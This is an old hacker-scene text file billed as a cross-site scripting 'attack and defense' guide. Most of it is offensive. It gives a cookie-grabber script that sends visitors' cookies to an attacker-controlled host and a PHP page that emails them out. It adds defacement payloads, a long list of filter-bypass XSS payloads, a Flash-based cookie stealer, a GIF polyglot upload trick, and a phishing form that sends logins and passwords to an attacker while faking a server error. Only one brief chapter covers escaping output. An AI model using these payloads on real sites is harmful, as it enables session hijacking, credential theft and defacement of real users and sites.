____ / / ________________________________________________________________________/ / | / / | Cross Site Scripting - Attack and Defense guide / / |_____________________________________________________________________/ / / / By Xylitol 10-02-08 /___/ Author: Xylitol Description: a simple guide on XSS methods. Homepage: http://xylitol.free.fr Contact: Xylitol[at]fbi[dot]gov Date: 10/02/08 Summary: 1> What is XSS ? 2> Code a XSS vulnerability 3> Make a cookie grabber 4> Securing XSS 5> Deface Methods 6> Filteration Bypassing 7> Flash attak 8> XSS upload 9> phishing XSS ____ ____ / / / / ______/ /_____________________________________/ /______ | / / / / | | / /.: Chapter 1 - What is XSS ? :./ / | |___/ /___________________________________________/ /___| / / (From Wikipedia, the free encyclopedia) / / /___/ /___/ Cross-zone scripting is a browser exploit taking advantage of a vulnerability within a zone-based security solution. The attack allows content (scripts) in unprivileged zones to be executed with the permissions of a privileged zone - i.e. a privilege escalation within the client (web browser) executing the script. The vulnerability could be: * a web browser bug which under some conditions allows content (scripts) in one zone to be executed with the permissions of a higher privileged zone. * a web browser configuration error; unsafe sites listed in privileged zones. * a cross-site scripting vulnerability within a privileged zone A common attack scenario involves two steps. The first step is to use a Cross Zone Scripting vulnerability to get scripts executed within a privileged zone. To complete the attack, then perform malicious actions on the computer using insecure ActiveX components. This type of vulnerability has been exploited to silently install various malware (such as spyware, remote control software, worms and such) onto computers browsing a malicious web page. ____ ____ / / / / ______/ /_____________________________________/ /______ | / / / / | | / /.:Chapter 2 - Code a XSS vulnerability :./ / | |___/ /___________________________________________/ /___| / / / / /___/ /___/ Open notepad and copy/past this script: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <style type="text/css"> <!-- body,td,th { color: #FFFFFF; } body { background-color: #000000; } --> </style><title>Simple XSS vulnerability by Xylitol</title> <body> <form action="XSS.php" method="post"> <p align="center"><strong>Simple XSS vulnerability by Xylitol </strong></p> <div align="center"> <table width="270" border="0"> <tr> <td width="106"><strong>Search:</strong></td> <td width="154"><input name="Vulnerability" type="text" id="Vulnerability" /></td> </tr> </table> <table width="268" border="0"> <tr> <td width="262"><div align="center"> <input name="submit" type="submit" value=" Search it ! " /> </div></td> </tr> </table> </div> </form> </body> </html> after, save this page: index.html open a new notpad and Copy/past that: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Search result:</title> <style type="text/css"> <!-- body,td,th { color: #FFFFFF; } body { background-color: #000000; } --> </style></head> <body> <span class="alerte">Search result :</span> <strong><?php echo $_POST['Vulnerability']; ?></strong> </body> </html> save this page in: XSS.php close notepad open index.html in firefox enter a value and search return on the page of research and enter <script>alert('XSS')</script> send the form bingo a dialogue box ! _______________________________________ / http://127.0.0.1 dit: X / |________________________________________| | | | | | ^ | | / / | | / | / XSS | | / . / | | ------- | | ______ | | | OK | | | ------ | |________________________________________| XSS Vulnerability is here... ____ ____ / / / / ______/ /____________________________________/ /______ | / / / / | | / /.: Chapter 3 - Make a cookie grabbers :./ / | |___/ /__________________________________________/ /___| / / / / /___/ /___/ insert this script in a vulnerable page (for exemple a guestbook) <script> window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie); </script> (www.Hax0r.com = your site) Open notepad and make a page: cookie.php copy/past this code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Error</title> <style type="text/css"> <!-- body,td,th { color: #FFFFFF; } body { background-color: #000000; } --> </style></head> <? mail('email@example.com', 'Cookie stealed ! - thx xyli :)', $cookies); ?> <body> <h2><strong>Error</strong> - <strong>Access denied</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2> </body> </html> It is not enough any more but for the pirate, than to await the reception of the email and to read the cookie there. ____ ____ / / / / ______/ /___________________________________/ /______ | / / / / | | / /.: Chapter 4 - Securing XSS :./ / | |___/ /_________________________________________/ /___| / / / / /___/ /___/ FIX it: for fix XSS Vulnerability use htmlentities: in line 16 Remplace: <body> <span class="alerte">Search result :</span> <strong><?php echo $_POST['Vulnerability']; ?></strong> </body> By: <body> <span class="alerte">Search result :</span> <strong><?php if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?></strong> </body> use htmlspecialchars() function in PHP ;) other function: htmlentities() quotes strip_tags() ... ____ ____ / / / / ______/ /___________________________________/ /______ | / / / / | | / /.: Chapter 5 -deface Methods :./ / | |___/ /_________________________________________/ /___| / / / / /___/ /___/ defacer with a XSS and a rather simple thing here are the principal ones… defacement by an image: <IMG SRC="http://hax0r.com/Haxored.png"> or a video flash: <EMBED SRC="http://hax0r.com/Haxored.swf" more knew: the redirection: <script>window.open( "http://www.hax0r.com/Haxored.html" )</script> also see: <meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" /> ____ ____ / / / / ______/ /___________________________________/ /______ | / / / / | | / /.: Chapter 6 - Filteration Bypassing :./ / | |___/ /_________________________________________/ /___| / / / / /___/ /___/ actually it's not that easy to bypass htmlspecialchars() here some other example of xss Bypass: <META HTTP-EQUIV=/"refresh/" CONTENT=/"0; URL=http://;URL=javascript:alert('XSS');/"> <META HTTP-EQUIV=/"refresh/" CONTENT=/"0;url=javascript:alert('XSS');/"> '">><marquee><h1>XSS</h1></marquee> '">><script>alert('XSS')</script> '>><marquee><h1>XSS</h1></marquee> "><script alert(String.fromCharCode(88,83,83))</script> <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> <div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo de(88,83,83));'))"> window.alert("Xyli !"); "/></a></><img src=1.gif onerror=alert(1)> [color=red' onmouseover="alert('xss')"]mouse over[/color] <body onLoad="alert('XSS');" <body onunload="javascript:alert('XSS');"> [url=javascript:alert('XSS');]click me[/url] <script language="JavaScript">alert('XSS')</script> <img src="javascript:alert('XSS')"> '); alert('XSS <font style='color:expression(alert(document.cookie))'> <IMG DYNSRC=/"javascript:alert('XSS')/"> <IMG LOWSRC=/"javascript:alert('XSS')/"> </textarea><script>alert(/xss/)</script> </title><script>alert(/xss/)</script> <script src=http://yoursite.com/your_files.js></script> "><script>alert(0)</script> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=/"jav
ascript:alert('XSS');/"> <IMG SRC=/"jav
ascript:alert('XSS');/"> <IMG SRC=/"jav	ascript:alert('XSS');/"> <marquee><script>alert('XSS')</script></marquee> <? echo('<scr)'; echo('ipt>alert(/"XSS/")</script>'); ?> <IMG SRC=/"jav
ascript:alert('XSS');/"> <IMG SRC=/"jav	ascript:alert('XSS');/"> <marquee><script>alert('XSS')</script></marquee> <style>@im/port'/ja/vasc/ript:alert(/"XSS/")';</style> <img src=foo.png onerror=alert(/xssed/) /> <script>alert(String.fromCharCode(88,83,83))</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+ escape(document.cookie)</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>alert('XSS');</script> <script>alert(1);</script> Here and there is of it full with others google is your friends ____ ____ / / / / ______/ /___________________________________/ /______ | / / / / | | / /.: Chapter 7 - Flash attack :./ / | |___/ /_________________________________________/ /___| / / / / /___/ /___/ Flash is used for complex animations, simulations, *creation of games etc.. What’s interesting for us is the getURL() action. This function allows us to redirect the end user to another page. its syntax is built as follows: getURL(url:String, [window: String,[method:String]]) exemple: getURL("http://victime.com/login.php?logout=true","_self"); url: indicate the URL of the site window: specify within which framework the request must take place (_self, _blank…) method: method of request GET or POST (by defect GET) here the handling of the actionscript and the Javascript to post a alert: getURL("javascript:alert('XSS'"); in 2002 one will show the danger of this facility, one could for example post the cookie of visitors in this manner: getURL("javascript:alert(document.cookie)") in December 2005, a new alternative and appeared consisting has to benefit from a nonpermanent fault XSS and possibility of putting a file flash in its signature to give a permanent XSS, moreover the author of this alternative used this technique in order to infect MySpace with a deviated worms xss of Samy: Samy Reloaded cookie stealer in flash ? not but there is technique to do it exemple in a flash file: GetURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self"); and in Haxored.js: document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie; For secure it simple solution: do not allow flash files in your web app ____ ____ / / / / ______/ /______________________________________/ /______ | / / / / | | / /.: Chapter 8 - XSS upload :./ / | |___/ /____________________________________________/ /___| / / / / /___/ /___/ Make Haxored.gif in paint for exemple after open Haxored.GIF in notepad delete all line and insert this: GIF89a<script>alert("XSS")</script> save and close it upload Haxored.gif in a free image hoster look your image and XSS is here... dont take Mozillia Firefox for look your image but Mozillia dont run your alert use Internet explorer Why add GIF89a ? well some upload like this one, check that the 'GIF89a' code is contained in the image as in any .GIF respective. the vulnerability of this upload results from the checking 'GIF89a' code for confirmation but of nothing the possible malicious codes contained in this image. GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script> to know the code for another image format, it is just enough to open an image jpg or other with a text editor, for example a png file: ‰PNG PNG = ‰PNG GIF = GIF89a JPG = ÿØÿà JFIF BMP = BMFÖ For secure it dont check getimagesize() only ____ ____ / / / / ______/ /______________________________________/ /______ | / / / / | | / /.: Chapter 9 - Phishing XSS :./ / | |___/ /____________________________________________/ /___| / / / / /___/ /___/ you understood the goal of the phishing ? and XSS ? in our example it will be necessary to find a Vulnerable site to the XSS and to inject there oneself in a form to oneself directly in the URL the following code: <p>Enter your login and password, thank:</p> <form action="http://hax0r.com/mail.php"> <table><tr><td>Login:</td><td><input type=text length=20 name=login> </td></tr><tr><td>Password:</td><td> <input type=text length=20 name=password> </td></tr></table><input type=submit value= OK > </form> you will have it to guess script will simulate a form of connextion and send the value to you example of file php for sending this email (mail.php): <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Error</title> <style type="text/css"> <!-- body,td,th { color: #FFFFFF; } body { background-color: #000000; } --> </style></head> <?php $login = $HTTP_GET_VARS["login"]; $password = $HTTP_GET_VARS["password"]; mail("email@example.com", "Cookie stealed ! - thx xyli :)", $password , $login ); ?> <body> <h2><strong>Error</strong> -<strong> Server too much busy</strong></h2> </body> </html> the user will believe that the waiter and overloads some and will not suspect nothing I think that you understood this principle ? ____ ____ / / / / ______/ /______________________________________/ /______ | / / / / | | / /.: Xylitol respects and hello's fly out :./ / | |___/ /____________________________________________/ /___| / / / / /___/ /___/ nexus, Langy, Uber0n, FullFreeez, RePliKaN!, bl00d, c0de91, Xonzai Agent-D, Agent-Z, Vamp, Xspider, Mitnick, Honnox, Blwood, str0ke and all hardworking sceners in the scene ! _________________________________ | | | .: Xylitol thanks this sites :. | |_________________________________| http://www.googlebig.com/ http://xssed.com/ http://www.xssing.com/ http://www.milw0rm.com/ http://H4cky0u.org/ If you want to contact me for any stupid reason, drop me an MSN or WLM only: Xylitol[at]fbi[dot]gov ____ / / / /_____________________________________________________________________________ / / | / / Cross Site Scripting - Attack and Defense guide | / /__________________________________________________________________________| / / /___/ By Xylitol 10-02-08